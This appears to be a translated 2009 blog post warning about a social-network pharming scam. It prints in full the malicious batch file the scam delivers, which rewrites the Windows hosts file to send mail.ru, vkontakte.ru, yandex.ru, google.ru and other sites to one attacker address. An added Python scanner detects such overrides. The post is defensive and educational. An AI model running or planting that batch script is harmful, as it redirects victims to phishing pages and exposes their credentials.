
Pharming in social networks

It seems that another epidemic of pharming has begun through social networks.

In one of the well-known popular social networks (or maybe more than one?), friends receive messages of this kind through the private-message system:
I do not have one file that I need, can you trust me?

To which a person, of course, gets an answer:
I can, hello)

And after a while receives the following message:
urlshort.me ** file without any errors start?))

(the address is masked with asterisks on purpose, so that nobody is tempted to click it :)

As someone taught by life experience (my own included), I followed the link in the browser's incognito mode. The shortened link leads to one of the most popular file-sharing services, which offers the file qip_unfium.bat for download.

The unsuspecting user clicks on this file, wanting to help a friend deal with the problem with Kvip Unfium, and ... the following code is executed:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

By the way, the file contains 662 empty lines before the actual body of the script.

The consequences of this script need no explanation: every listed domain (mail.ru, vkontakte.ru, yandex.ru, google.ru and the rest) now resolves to 81.94.229.115 on the victim's machine, bypassing DNS entirely, so whatever that host serves is what the user sees when typing the familiar address.
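The hosts-file overrides above are easy to spot once you know to look for them. The following script is an added example, not code from the original post: it parses hosts-file text and flags lines that point a well-known domain, or a whole cluster of hostnames, at a single public address. The list of watched domains is taken from the batch script; the sample hosts content is constructed for the demonstration, and the default file path is the standard Windows location.

```python
"""Scan a Windows hosts file for pharming-style overrides.

Added example (not from the original post). Two heuristics:
  1. a watched domain mapped to an address that is not loopback/private;
  2. one public address receiving several distinct hostnames at once,
     which is the signature of a bulk hijack like the batch script above.
"""
import ipaddress
from collections import defaultdict

# Registrable domains that the post's script hijacks; extend as needed.
WATCHED_DOMAINS = {
    "mail.ru", "vkontakte.ru", "yandex.ru", "google.ru",
    "rambler.ru", "ya.ru", "odnoklasniki.ru", "i.ua",
}

# Constructed sample: a default hosts file plus three lines of the kind
# the batch script appends, and one legitimate private-network entry.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
81.94.229.115 www.mail.ru
81.94.229.115 mail.ru
81.94.229.115 vkontakte.ru
192.168.1.10 intranet.example.test
"""


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs, skipping comments, blanks and bad IPs."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            yield addr, name.lower()


def registrable(name):
    """Crude registrable domain: last two labels (sufficient for the .ru/.ua names here)."""
    labels = name.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name


def find_pharming(text, min_cluster=3):
    """Return a list of (ip, hostname(s), reason) findings for the given hosts text."""
    findings = []
    by_ip = defaultdict(set)
    for addr, name in parse_hosts(text):
        # Loopback, RFC1918, link-local and unspecified entries are normal.
        if addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_unspecified:
            continue
        by_ip[addr].add(name)
        if registrable(name) in WATCHED_DOMAINS:
            findings.append((str(addr), name, "watched domain redirected to public IP"))
    for addr, names in by_ip.items():
        if len(names) >= min_cluster:
            findings.append((str(addr), ",".join(sorted(names)),
                             f"{len(names)} hostnames share one public IP"))
    return findings


if __name__ == "__main__":
    import os
    import sys
    # Default to the real Windows hosts file; fall back to the sample offline.
    path = sys.argv[1] if len(sys.argv) > 1 else os.path.join(
        os.environ.get("SystemRoot", r"C:\Windows"), "System32", "drivers", "etc", "hosts")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_HOSTS
    for ip, name, reason in find_pharming(text):
        print(f"{ip:16} {name:40} {reason}")
```

Run it with no arguments on a Windows box to check the live hosts file, or pass a path to a copied file. The private-address exemption keeps intranet entries quiet; the cluster heuristic catches hijacks of domains not on the watch list, since a legitimate hosts file almost never maps many unrelated names to one public address.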

The moral? For the hundred-thousandth time: beware of fakes, and check with your friends whether they really sent you such a link.

UPD, November 16, 2009: The second part of the Marlezon Ballet. :-)

Source: https://habr.com/ru/post/73515/
